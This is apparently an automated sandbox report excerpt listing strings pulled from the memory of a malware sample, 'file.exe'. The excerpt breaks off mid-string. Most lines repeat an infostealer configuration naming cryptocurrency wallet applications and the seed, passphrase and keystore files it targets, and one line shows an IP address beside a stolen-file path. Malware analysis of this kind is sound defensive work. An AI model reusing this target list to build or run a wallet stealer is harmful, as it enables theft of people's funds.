                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1957372627.0000000001069000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 185.215.113.16bert\AppData\Roaming\Binance\.finger-print.fpU
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000001.00000002.1955784660.0000000000705000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: coin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 